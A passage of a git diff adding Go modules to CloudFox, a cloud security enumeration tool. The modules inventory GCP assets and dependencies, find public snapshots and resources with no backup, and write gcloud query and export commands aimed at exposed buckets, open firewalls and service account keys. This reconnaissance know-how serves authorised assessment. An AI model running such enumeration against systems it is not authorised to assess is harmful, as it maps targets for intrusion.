globals.GCP_ASSET_INVENTORY_MODULE_NAME, + fmt.Sprintf("Could not count assets in project %s", projectID)) + return + } + + m.mu.Lock() + // Merge counts from multiple projects + countMap := make(map[string]int) + for _, c := range m.TypeCounts { + countMap[c.AssetType] = c.Count + } + for _, c := range counts { + countMap[c.AssetType] += c.Count + } + + m.TypeCounts = []assetservice.AssetTypeCount{} + for assetType, count := range countMap { + m.TypeCounts = append(m.TypeCounts, assetservice.AssetTypeCount{ + AssetType: assetType, + Count: count, + }) + } + m.mu.Unlock() +} + +// processProjectsDependencies analyzes assets with full dependency tracking +func (m *AssetInventoryModule) 
processProjectsDependencies(ctx context.Context, logger internal.Logger) { + logger.InfoM("Analyzing assets and dependencies...", globals.GCP_ASSET_INVENTORY_MODULE_NAME) + + assetClient, err := asset.NewClient(ctx) + if err != nil { + logger.ErrorM(fmt.Sprintf("Failed to create Cloud Asset client: %v", err), globals.GCP_ASSET_INVENTORY_MODULE_NAME) + return + } + defer assetClient.Close() + + var wg sync.WaitGroup + for _, projectID := range m.ProjectIDs { + wg.Add(1) + go func(project string) { + defer wg.Done() + m.processProjectWithDependencies(ctx, project, assetClient, logger) + }(projectID) + } + wg.Wait() + + // Analyze cross-project dependencies + m.analyzeCrossProjectResources() + + // Generate query templates + m.generateQueryTemplates() +} + +func (m *AssetInventoryModule) processProjectWithDependencies(ctx context.Context, projectID string, assetClient *asset.Client, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Analyzing dependencies in project: %s", projectID), globals.GCP_ASSET_INVENTORY_MODULE_NAME) + } + + parent := fmt.Sprintf("projects/%s", projectID) + req := &assetpb.ListAssetsRequest{ + Parent: parent, + ContentType: assetpb.ContentType_RESOURCE, + PageSize: 500, + } + + it := assetClient.ListAssets(ctx, req) + + for { + assetItem, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_ASSET_INVENTORY_MODULE_NAME, + fmt.Sprintf("Could not enumerate assets in project %s", projectID)) + break + } + + // Convert to AssetInfo for consistency + assetInfo := assetservice.AssetInfo{ + Name: assetItem.Name, + AssetType: assetItem.AssetType, + ProjectID: projectID, + } + + if assetItem.Resource != nil { + assetInfo.Location = assetItem.Resource.Location + } + + m.mu.Lock() + m.Assets = append(m.Assets, assetInfo) + m.mu.Unlock() + + // Analyze dependencies + 
m.analyzeAssetDependencies(assetItem, projectID) + } +} + +func (m *AssetInventoryModule) analyzeAssetDependencies(assetItem *assetpb.Asset, projectID string) { + if assetItem.Resource == nil || assetItem.Resource.Data == nil { + return + } + + // Common dependency patterns + dependencyFields := map[string]string{ + "network": "uses", + "subnetwork": "uses", + "serviceAccount": "uses", + "disk": "uses", + "snapshot": "references", + "image": "references", + "keyRing": "uses", + "cryptoKey": "uses", + "topic": "references", + "subscription": "references", + "bucket": "uses", + "dataset": "references", + "cluster": "contains", + } + + for field, depType := range dependencyFields { + if value, ok := assetItem.Resource.Data.Fields[field]; ok { + targetResource := value.GetStringValue() + if targetResource != "" { + dependency := ResourceDependency{ + SourceResource: assetItem.Name, + SourceType: assetItem.AssetType, + TargetResource: targetResource, + TargetType: m.inferResourceType(field), + DependencyType: depType, + ProjectID: projectID, + } + + m.mu.Lock() + m.Dependencies = append(m.Dependencies, dependency) + m.mu.Unlock() + } + } + } +} + +func (m *AssetInventoryModule) inferResourceType(fieldName string) string { + typeMap := map[string]string{ + "network": "compute.googleapis.com/Network", + "subnetwork": "compute.googleapis.com/Subnetwork", + "serviceAccount": "iam.googleapis.com/ServiceAccount", + "disk": "compute.googleapis.com/Disk", + "snapshot": "compute.googleapis.com/Snapshot", + "image": "compute.googleapis.com/Image", + "keyRing": "cloudkms.googleapis.com/KeyRing", + "cryptoKey": "cloudkms.googleapis.com/CryptoKey", + "topic": "pubsub.googleapis.com/Topic", + "subscription": "pubsub.googleapis.com/Subscription", + "bucket": "storage.googleapis.com/Bucket", + "dataset": "bigquery.googleapis.com/Dataset", + "cluster": "container.googleapis.com/Cluster", + } + + if assetType, ok := typeMap[fieldName]; ok { + return assetType + } + return "unknown" +} + 
+func (m *AssetInventoryModule) analyzeCrossProjectResources() { + m.mu.Lock() + defer m.mu.Unlock() + + targetToSources := make(map[string][]string) + targetToType := make(map[string]string) + + for _, dep := range m.Dependencies { + targetProject := m.extractProjectFromResource(dep.TargetResource) + if targetProject != "" && targetProject != dep.ProjectID { + targetToSources[dep.TargetResource] = append(targetToSources[dep.TargetResource], dep.ProjectID) + targetToType[dep.TargetResource] = dep.TargetType + } + } + + for target, sources := range targetToSources { + crossProject := CrossProjectResource{ + ResourceName: target, + ResourceType: targetToType[target], + OwnerProject: m.extractProjectFromResource(target), + AccessedFrom: sources, + } + + m.CrossProject = append(m.CrossProject, crossProject) + } +} + +func (m *AssetInventoryModule) extractProjectFromResource(resource string) string { + if strings.Contains(resource, "projects/") { + parts := strings.Split(resource, "/") + for i, part := range parts { + if part == "projects" && i+1 < len(parts) { + return parts[i+1] + } + } + } + return "" +} + +func (m *AssetInventoryModule) extractResourceName(resource string) string { + parts := strings.Split(resource, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return resource +} + +func (m *AssetInventoryModule) generateQueryTemplates() { + templates := []struct { + Name string + Description string + Query string + }{ + {"Public Storage Buckets", "Find all public GCS buckets", `resource.type="storage.googleapis.com/Bucket" AND resource.data.iamConfiguration.uniformBucketLevelAccess.enabled=false`}, + {"VMs with External IPs", "Find compute instances with external IP addresses", `resource.type="compute.googleapis.com/Instance" AND resource.data.networkInterfaces.accessConfigs:*`}, + {"Service Account Keys", "Find all user-managed service account keys", `resource.type="iam.googleapis.com/ServiceAccountKey" AND resource.data.keyType="USER_MANAGED"`}, + 
{"Firewall Rules - Open to Internet", "Find firewall rules allowing 0.0.0.0/0", `resource.type="compute.googleapis.com/Firewall" AND resource.data.sourceRanges:"0.0.0.0/0"`}, + {"Cloud SQL - Public IPs", "Find Cloud SQL instances with public IP", `resource.type="sqladmin.googleapis.com/Instance" AND resource.data.settings.ipConfiguration.ipv4Enabled=true`}, + {"Unencrypted Disks", "Find disks without customer-managed encryption", `resource.type="compute.googleapis.com/Disk" AND NOT resource.data.diskEncryptionKey:*`}, + {"GKE Clusters - Legacy Auth", "Find GKE clusters with legacy authentication", `resource.type="container.googleapis.com/Cluster" AND resource.data.legacyAbac.enabled=true`}, + } + + for _, t := range templates { + m.LootMap["asset-inventory-commands"].Contents += fmt.Sprintf( + "# %s - %s\ngcloud asset search-all-resources --scope=projects/PROJECT_ID --query='%s'\n\n", + t.Name, t.Description, t.Query, + ) + } + + // Add export commands + m.LootMap["asset-inventory-commands"].Contents += "# Export complete asset inventory\n" + for _, projectID := range m.ProjectIDs { + m.LootMap["asset-inventory-commands"].Contents += fmt.Sprintf( + "gcloud asset export --project=%s --content-type=resource --output-path=gs://BUCKET_NAME/%s-assets.json\n", + projectID, projectID, + ) + } +} + +func (m *AssetInventoryModule) initializeLootFiles() { + m.LootMap["asset-inventory-details"] = &internal.LootFile{ + Name: "asset-inventory-details", + Contents: "# Cloud Asset Inventory Details\n# Generated by CloudFox\n\n", + } + m.LootMap["asset-inventory-commands"] = &internal.LootFile{ + Name: "asset-inventory-commands", + Contents: "# Cloud Asset Inventory Commands\n# Generated by CloudFox\n\n", + } +} + +func (m *AssetInventoryModule) addToLoot(asset assetservice.AssetInfo) { + m.LootMap["asset-inventory-details"].Contents += fmt.Sprintf( + "# Asset: %s\n# Type: %s\n# Project: %s\n# Location: %s\n", + asset.Name, asset.AssetType, asset.ProjectID, asset.Location) + + if 
asset.PublicAccess { + m.LootMap["asset-inventory-details"].Contents += "# Public Access: Yes\n" + } + m.LootMap["asset-inventory-details"].Contents += "\n" +} + +func (m *AssetInventoryModule) writeOutput(ctx context.Context, logger internal.Logger) { + var tables []internal.TableFile + + // Asset counts table (if we have counts) + if len(m.TypeCounts) > 0 { + // Sort by count descending + sort.Slice(m.TypeCounts, func(i, j int) bool { + return m.TypeCounts[i].Count > m.TypeCounts[j].Count + }) + + header := []string{"Asset Type", "Count"} + var body [][]string + for _, tc := range m.TypeCounts { + body = append(body, []string{ + tc.AssetType, + fmt.Sprintf("%d", tc.Count), + }) + } + tables = append(tables, internal.TableFile{ + Name: "asset-counts", + Header: header, + Body: body, + }) + } + + // Assets table (if we have assets) + if len(m.Assets) > 0 { + if checkIAM { + // When checking IAM, show one row per IAM binding member + header := []string{"Project ID", "Project Name", "Name", "Asset Type", "Location", "Role", "Member", "Public"} + + var body [][]string + for _, asset := range m.Assets { + publicAccess := "No" + if asset.PublicAccess { + publicAccess = "Yes" + } + + // If no IAM bindings, still show the asset + if len(asset.IAMBindings) == 0 { + body = append(body, []string{ + asset.ProjectID, + m.GetProjectName(asset.ProjectID), + asset.Name, + assetservice.ExtractAssetTypeShort(asset.AssetType), + asset.Location, + "-", + "-", + publicAccess, + }) + } else { + // One row per member per role + for _, binding := range asset.IAMBindings { + for _, member := range binding.Members { + body = append(body, []string{ + asset.ProjectID, + m.GetProjectName(asset.ProjectID), + asset.Name, + assetservice.ExtractAssetTypeShort(asset.AssetType), + asset.Location, + binding.Role, + member, + publicAccess, + }) + } + } + } + } + tables = append(tables, internal.TableFile{ + Name: "assets", + Header: header, + Body: body, + }) + + // Public assets table + var 
publicBody [][]string + for _, asset := range m.Assets { + if asset.PublicAccess { + for _, binding := range asset.IAMBindings { + for _, member := range binding.Members { + if member == "allUsers" || member == "allAuthenticatedUsers" { + publicBody = append(publicBody, []string{ + asset.ProjectID, + m.GetProjectName(asset.ProjectID), + asset.Name, + asset.AssetType, + binding.Role, + member, + }) + } + } + } + } + } + + if len(publicBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "public-assets", + Header: []string{"Project ID", "Project Name", "Name", "Asset Type", "Role", "Member"}, + Body: publicBody, + }) + } + } else { + // Basic listing without IAM + header := []string{"Project ID", "Project Name", "Name", "Asset Type", "Location"} + var body [][]string + for _, asset := range m.Assets { + body = append(body, []string{ + asset.ProjectID, + m.GetProjectName(asset.ProjectID), + asset.Name, + assetservice.ExtractAssetTypeShort(asset.AssetType), + asset.Location, + }) + } + tables = append(tables, internal.TableFile{ + Name: "assets", + Header: header, + Body: body, + }) + } + } + + // Dependencies table (if we have dependencies) + if len(m.Dependencies) > 0 { + depsHeader := []string{"Project ID", "Project Name", "Source", "Dependency Type", "Target", "Target Type"} + var depsBody [][]string + for _, d := range m.Dependencies { + depsBody = append(depsBody, []string{ + d.ProjectID, + m.GetProjectName(d.ProjectID), + m.extractResourceName(d.SourceResource), + d.DependencyType, + m.extractResourceName(d.TargetResource), + assetservice.ExtractAssetTypeShort(d.TargetType), + }) + + // Add to loot + m.LootMap["asset-inventory-details"].Contents += fmt.Sprintf( + "# Dependency: %s -> %s (%s)\n", + m.extractResourceName(d.SourceResource), + m.extractResourceName(d.TargetResource), + d.DependencyType, + ) + } + tables = append(tables, internal.TableFile{ + Name: "asset-dependencies", + Header: depsHeader, + Body: depsBody, + }) + } + + // 
Cross-project resources table (if we have cross-project resources) + if len(m.CrossProject) > 0 { + crossHeader := []string{"Resource", "Type", "Owner Project", "Accessed From"} + var crossBody [][]string + for _, c := range m.CrossProject { + crossBody = append(crossBody, []string{ + m.extractResourceName(c.ResourceName), + assetservice.ExtractAssetTypeShort(c.ResourceType), + c.OwnerProject, + strings.Join(c.AccessedFrom, ", "), + }) + } + tables = append(tables, internal.TableFile{ + Name: "cross-project-resources", + Header: crossHeader, + Body: crossBody, + }) + } + + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + output := AssetInventoryOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_ASSET_INVENTORY_MODULE_NAME) + } +} diff --git a/gcp/commands/backupinventory.go b/gcp/commands/backupinventory.go new file mode 100644 index 00000000..09d5a602 --- /dev/null +++ b/gcp/commands/backupinventory.go @@ -0,0 +1,743 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + "time" + + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" + + "google.golang.org/api/compute/v1" + "google.golang.org/api/sqladmin/v1beta4" +) + +// Module name constant +const GCP_BACKUPINVENTORY_MODULE_NAME string = "backup-inventory" + +var GCPBackupInventoryCommand = &cobra.Command{ + Use: GCP_BACKUPINVENTORY_MODULE_NAME, + 
Aliases: []string{"backups", "backup", "snapshots", "dr"}, + Short: "Enumerate backup policies, protected resources, and identify backup gaps", + Long: `Inventory backup and disaster recovery configurations across GCP resources. + +Features: +- Compute Engine disk snapshots and snapshot schedules +- Cloud SQL automated backups and point-in-time recovery +- Identifies unprotected resources (no backup coverage) +- Analyzes backup retention policies +- Checks for stale or failing backups`, + Run: runGCPBackupInventoryCommand, +} + +// ------------------------------ +// Data Structures +// ------------------------------ + +type BackupResource struct { + ProjectID string + Name string + ResourceType string // compute-disk, cloudsql-instance + Location string + SizeGB int64 + Protected bool + BackupType string // snapshot, automated, none + Schedule string + RetentionDays int + LastBackup string + BackupCount int + BackupStatus string + PITREnabled bool + BackupLocation string +} + +type IAMBinding struct { + Role string + Members []string +} + +type ComputeSnapshot struct { + ProjectID string + Name string + SourceDisk string + Status string + DiskSizeGB int64 + StorageBytes int64 + CreationTime string + StorageLocats []string + AutoCreated bool + SnapshotType string + IAMBindings []IAMBinding + PublicAccess bool +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type BackupInventoryModule struct { + gcpinternal.BaseGCPModule + + Resources []BackupResource + Snapshots []ComputeSnapshot + LootMap map[string]*internal.LootFile + mu sync.Mutex + + // Tracking maps + disksWithBackups map[string]bool + sqlWithBackups map[string]bool + allDisks map[string]diskInfo + allSQLInstances map[string]sqlInstanceInfo +} + +type diskInfo struct { + SizeGB int64 + Zone string + ProjectID string + Name string +} + +type sqlInstanceInfo struct { + ProjectID string + Region string +} + +// ------------------------------ +// Output Struct +// 
------------------------------ +type BackupInventoryOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o BackupInventoryOutput) TableFiles() []internal.TableFile { return o.Table } +func (o BackupInventoryOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPBackupInventoryCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, GCP_BACKUPINVENTORY_MODULE_NAME) + if err != nil { + return + } + + module := &BackupInventoryModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Resources: []BackupResource{}, + Snapshots: []ComputeSnapshot{}, + LootMap: make(map[string]*internal.LootFile), + disksWithBackups: make(map[string]bool), + sqlWithBackups: make(map[string]bool), + allDisks: make(map[string]diskInfo), + allSQLInstances: make(map[string]sqlInstanceInfo), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *BackupInventoryModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM("Inventorying backup configurations...", GCP_BACKUPINVENTORY_MODULE_NAME) + + computeService, err := compute.NewService(ctx) + if err != nil { + logger.ErrorM(fmt.Sprintf("Failed to create Compute service: %v", err), GCP_BACKUPINVENTORY_MODULE_NAME) + return + } + + sqlService, err := sqladmin.NewService(ctx) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Failed to create SQL Admin service: %v", err), GCP_BACKUPINVENTORY_MODULE_NAME) + } + } + + var wg sync.WaitGroup + for _, projectID := range m.ProjectIDs { + wg.Add(1) + go func(project string) { + defer wg.Done() + m.processProject(ctx, project, computeService, sqlService, logger) + }(projectID) + } + wg.Wait() + + // Identify 
unprotected resources + m.identifyUnprotectedResources() + + if len(m.Resources) == 0 && len(m.Snapshots) == 0 { + logger.InfoM("No backup data found", GCP_BACKUPINVENTORY_MODULE_NAME) + return + } + + // Count protected vs unprotected + protectedCount := 0 + unprotectedCount := 0 + for _, r := range m.Resources { + if r.Protected { + protectedCount++ + } else { + unprotectedCount++ + } + } + + // Count public snapshots + publicSnapshotCount := 0 + for _, s := range m.Snapshots { + if s.PublicAccess { + publicSnapshotCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d resource(s): %d protected, %d unprotected, %d snapshot(s)", + len(m.Resources), protectedCount, unprotectedCount, len(m.Snapshots)), GCP_BACKUPINVENTORY_MODULE_NAME) + + if unprotectedCount > 0 { + logger.InfoM(fmt.Sprintf("Found %d resource(s) without backup coverage", unprotectedCount), GCP_BACKUPINVENTORY_MODULE_NAME) + } + + if publicSnapshotCount > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] Found %d publicly accessible snapshot(s)!", publicSnapshotCount), GCP_BACKUPINVENTORY_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *BackupInventoryModule) processProject(ctx context.Context, projectID string, computeService *compute.Service, sqlService *sqladmin.Service, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating backups for project: %s", projectID), GCP_BACKUPINVENTORY_MODULE_NAME) + } + + // List all disks first (for gap analysis) + m.enumerateDisks(ctx, projectID, computeService, logger) + + // List snapshots + m.enumerateSnapshots(ctx, projectID, computeService, logger) + + // List SQL instances and backups + if sqlService != nil { + m.enumerateSQLBackups(ctx, projectID, sqlService, logger) + } +} + +func (m *BackupInventoryModule) enumerateDisks(ctx context.Context, projectID string, computeService 
*compute.Service, logger internal.Logger) { + req := computeService.Disks.AggregatedList(projectID) + err := req.Pages(ctx, func(page *compute.DiskAggregatedList) error { + for zone, diskList := range page.Items { + if diskList.Disks == nil { + continue + } + for _, disk := range diskList.Disks { + m.mu.Lock() + m.allDisks[disk.SelfLink] = diskInfo{ + SizeGB: disk.SizeGb, + Zone: m.extractZoneFromURL(zone), + ProjectID: projectID, + Name: disk.Name, + } + m.mu.Unlock() + } + } + return nil + }) + + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_BACKUPINVENTORY_MODULE_NAME, + fmt.Sprintf("Could not enumerate disks in project %s", projectID)) + } +} + +func (m *BackupInventoryModule) enumerateSnapshots(ctx context.Context, projectID string, computeService *compute.Service, logger internal.Logger) { + req := computeService.Snapshots.List(projectID) + err := req.Pages(ctx, func(page *compute.SnapshotList) error { + for _, snapshot := range page.Items { + snap := ComputeSnapshot{ + ProjectID: projectID, + Name: snapshot.Name, + SourceDisk: snapshot.SourceDisk, + Status: snapshot.Status, + DiskSizeGB: snapshot.DiskSizeGb, + StorageBytes: snapshot.StorageBytes, + CreationTime: snapshot.CreationTimestamp, + StorageLocats: snapshot.StorageLocations, + AutoCreated: snapshot.AutoCreated, + SnapshotType: snapshot.SnapshotType, + } + + // Get IAM policy for this snapshot + iamPolicy, iamErr := computeService.Snapshots.GetIamPolicy(projectID, snapshot.Name).Context(ctx).Do() + if iamErr == nil && iamPolicy != nil { + for _, binding := range iamPolicy.Bindings { + snap.IAMBindings = append(snap.IAMBindings, IAMBinding{ + Role: binding.Role, + Members: binding.Members, + }) + // Check for public access + for _, member := range binding.Members { + if member == "allUsers" || member == "allAuthenticatedUsers" { + snap.PublicAccess = true + } + } + } + } + + m.mu.Lock() + m.Snapshots = append(m.Snapshots, snap) + 
m.disksWithBackups[snapshot.SourceDisk] = true + m.mu.Unlock() + } + return nil + }) + + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_BACKUPINVENTORY_MODULE_NAME, + fmt.Sprintf("Could not enumerate snapshots in project %s", projectID)) + } + + // Track protected resources from snapshots + m.trackSnapshotProtection(projectID) +} + +func (m *BackupInventoryModule) trackSnapshotProtection(projectID string) { + // Group snapshots by source disk + diskSnapshots := make(map[string][]ComputeSnapshot) + for _, snap := range m.Snapshots { + if snap.ProjectID == projectID { + diskSnapshots[snap.SourceDisk] = append(diskSnapshots[snap.SourceDisk], snap) + } + } + + m.mu.Lock() + defer m.mu.Unlock() + + for diskURL, snaps := range diskSnapshots { + // Find latest snapshot + var latestTime time.Time + var latestSnap ComputeSnapshot + for _, snap := range snaps { + t, err := time.Parse(time.RFC3339, snap.CreationTime) + if err == nil && t.After(latestTime) { + latestTime = t + latestSnap = snap + } + } + + diskInfo := m.allDisks[diskURL] + backupStatus := latestSnap.Status + + // Calculate age of last backup + if !latestTime.IsZero() { + age := time.Since(latestTime) + if age > 7*24*time.Hour { + backupStatus = "STALE" + } else { + backupStatus = "CURRENT" + } + } + + resource := BackupResource{ + ProjectID: projectID, + Name: m.extractDiskName(diskURL), + ResourceType: "compute-disk", + Location: diskInfo.Zone, + SizeGB: diskInfo.SizeGB, + Protected: true, + BackupType: "snapshot", + LastBackup: latestSnap.CreationTime, + BackupCount: len(snaps), + BackupStatus: backupStatus, + BackupLocation: strings.Join(latestSnap.StorageLocats, ","), + } + + m.Resources = append(m.Resources, resource) + } +} + +func (m *BackupInventoryModule) enumerateSQLBackups(ctx context.Context, projectID string, sqlService *sqladmin.Service, logger internal.Logger) { + instances, err := sqlService.Instances.List(projectID).Do() + if err != nil { + 
m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_BACKUPINVENTORY_MODULE_NAME, + fmt.Sprintf("Could not enumerate SQL instances in project %s", projectID)) + return + } + + for _, instance := range instances.Items { + m.mu.Lock() + m.allSQLInstances[instance.Name] = sqlInstanceInfo{ + ProjectID: projectID, + Region: instance.Region, + } + m.mu.Unlock() + + // Check backup configuration + backupEnabled := false + pitrEnabled := false + var retentionDays int + var backupStartTime string + + if instance.Settings != nil && instance.Settings.BackupConfiguration != nil { + backupEnabled = instance.Settings.BackupConfiguration.Enabled + pitrEnabled = instance.Settings.BackupConfiguration.PointInTimeRecoveryEnabled + retentionDays = int(instance.Settings.BackupConfiguration.TransactionLogRetentionDays) + backupStartTime = instance.Settings.BackupConfiguration.StartTime + } + + if backupEnabled { + m.mu.Lock() + m.sqlWithBackups[instance.Name] = true + m.mu.Unlock() + + // List actual backups for this instance + backups, err := sqlService.BackupRuns.List(projectID, instance.Name).Do() + if err != nil { + continue + } + + var latestBackupTime string + var latestStatus string + var latestLocation string + backupCount := 0 + + for _, backup := range backups.Items { + backupCount++ + if latestBackupTime == "" || backup.StartTime > latestBackupTime { + latestBackupTime = backup.StartTime + latestStatus = backup.Status + latestLocation = backup.Location + } + } + + resource := BackupResource{ + ProjectID: projectID, + Name: instance.Name, + ResourceType: "cloudsql-instance", + Location: instance.Region, + Protected: true, + BackupType: "automated", + Schedule: fmt.Sprintf("Daily at %s", backupStartTime), + RetentionDays: retentionDays, + LastBackup: latestBackupTime, + BackupCount: backupCount, + BackupStatus: latestStatus, + PITREnabled: pitrEnabled, + BackupLocation: latestLocation, + } + + m.mu.Lock() + m.Resources = append(m.Resources, resource) + 
m.mu.Unlock() + } + } +} + +// ------------------------------ +// Gap Analysis +// ------------------------------ +func (m *BackupInventoryModule) identifyUnprotectedResources() { + m.mu.Lock() + defer m.mu.Unlock() + + // Find disks without snapshots + for diskURL, info := range m.allDisks { + if !m.disksWithBackups[diskURL] { + resource := BackupResource{ + ProjectID: info.ProjectID, + Name: info.Name, + ResourceType: "compute-disk", + Location: info.Zone, + SizeGB: info.SizeGB, + Protected: false, + BackupType: "none", + } + + m.Resources = append(m.Resources, resource) + + // Add to loot + m.LootMap["backup-inventory-commands"].Contents += fmt.Sprintf( + "# Unprotected disk: %s (%s) - %dGB\n"+ + "gcloud compute resource-policies create snapshot-schedule %s-backup \\\n"+ + " --project=%s \\\n"+ + " --region=%s \\\n"+ + " --max-retention-days=30 \\\n"+ + " --daily-schedule\n\n", + info.Name, info.ProjectID, info.SizeGB, + info.Name, info.ProjectID, m.extractRegionFromZone(info.Zone), + ) + } + } + + // Find SQL instances without backups + for instanceName, info := range m.allSQLInstances { + if !m.sqlWithBackups[instanceName] { + resource := BackupResource{ + ProjectID: info.ProjectID, + Name: instanceName, + ResourceType: "cloudsql-instance", + Location: info.Region, + Protected: false, + BackupType: "none", + } + + m.Resources = append(m.Resources, resource) + + // Add to loot + m.LootMap["backup-inventory-commands"].Contents += fmt.Sprintf( + "# Unprotected SQL instance: %s\n"+ + "gcloud sql instances patch %s \\\n"+ + " --backup-start-time=02:00 \\\n"+ + " --enable-bin-log\n\n", + instanceName, instanceName, + ) + } + } +} + +// ------------------------------ +// Helper Functions +// ------------------------------ +func (m *BackupInventoryModule) extractDiskName(url string) string { + parts := strings.Split(url, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return url +} + +func (m *BackupInventoryModule) extractZoneFromURL(url string) string 
{ + if strings.Contains(url, "zones/") { + parts := strings.Split(url, "/") + for i, part := range parts { + if part == "zones" && i+1 < len(parts) { + return parts[i+1] + } + } + } + return "" +} + +func (m *BackupInventoryModule) extractRegionFromZone(zone string) string { + if zone == "" { + return "" + } + // Zone format: us-central1-a -> Region: us-central1 + parts := strings.Split(zone, "-") + if len(parts) >= 2 { + return strings.Join(parts[:len(parts)-1], "-") + } + return zone +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *BackupInventoryModule) initializeLootFiles() { + m.LootMap["backup-inventory-commands"] = &internal.LootFile{ + Name: "backup-inventory-commands", + Contents: "# Backup Inventory Commands\n" + + "# Generated by CloudFox\n\n", + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *BackupInventoryModule) writeOutput(ctx context.Context, logger internal.Logger) { + var tables []internal.TableFile + + // Main backup inventory table (all resources) + if len(m.Resources) > 0 { + header := []string{ + "Project ID", + "Project Name", + "Resource", + "Type", + "Location", + "Size (GB)", + "Protected", + "Backup Type", + "Schedule", + "Retention", + "Last Backup", + "Count", + "Status", + "PITR", + } + + var body [][]string + for _, r := range m.Resources { + protectedStr := "No" + if r.Protected { + protectedStr = "Yes" + } + + pitrStr := "No" + if r.PITREnabled { + pitrStr = "Yes" + } + + retentionStr := "" + if r.RetentionDays > 0 { + retentionStr = fmt.Sprintf("%d days", r.RetentionDays) + } + + sizeStr := "" + if r.SizeGB > 0 { + sizeStr = fmt.Sprintf("%d", r.SizeGB) + } + + countStr := "" + if r.BackupCount > 0 { + countStr = fmt.Sprintf("%d", r.BackupCount) + } + + body = append(body, []string{ + r.ProjectID, + m.GetProjectName(r.ProjectID), + r.Name, + r.ResourceType, + r.Location, + sizeStr, + protectedStr, + 
r.BackupType, + r.Schedule, + retentionStr, + r.LastBackup, + countStr, + r.BackupStatus, + pitrStr, + }) + } + + tables = append(tables, internal.TableFile{ + Name: "backup-inventory", + Header: header, + Body: body, + }) + } + + // Snapshots table (one row per IAM binding member) + if len(m.Snapshots) > 0 { + header := []string{ + "Project ID", + "Project Name", + "Snapshot", + "Source Disk", + "Size (GB)", + "Created", + "Status", + "Type", + "Auto Created", + "Locations", + "Role", + "Member", + "Public", + } + + var body [][]string + for _, s := range m.Snapshots { + autoCreatedStr := "No" + if s.AutoCreated { + autoCreatedStr = "Yes" + } + + publicAccess := "No" + if s.PublicAccess { + publicAccess = "Yes" + } + + // If no IAM bindings, still show the snapshot + if len(s.IAMBindings) == 0 { + body = append(body, []string{ + s.ProjectID, + m.GetProjectName(s.ProjectID), + s.Name, + m.extractDiskName(s.SourceDisk), + fmt.Sprintf("%d", s.DiskSizeGB), + s.CreationTime, + s.Status, + s.SnapshotType, + autoCreatedStr, + strings.Join(s.StorageLocats, ","), + "-", + "-", + publicAccess, + }) + } else { + // One row per member per role + for _, binding := range s.IAMBindings { + for _, member := range binding.Members { + body = append(body, []string{ + s.ProjectID, + m.GetProjectName(s.ProjectID), + s.Name, + m.extractDiskName(s.SourceDisk), + fmt.Sprintf("%d", s.DiskSizeGB), + s.CreationTime, + s.Status, + s.SnapshotType, + autoCreatedStr, + strings.Join(s.StorageLocats, ","), + binding.Role, + member, + publicAccess, + }) + } + } + } + } + + tables = append(tables, internal.TableFile{ + Name: "backup-snapshots", + Header: header, + Body: body, + }) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + output := BackupInventoryOutput{ + Table: tables, + Loot: lootFiles, + } + + 
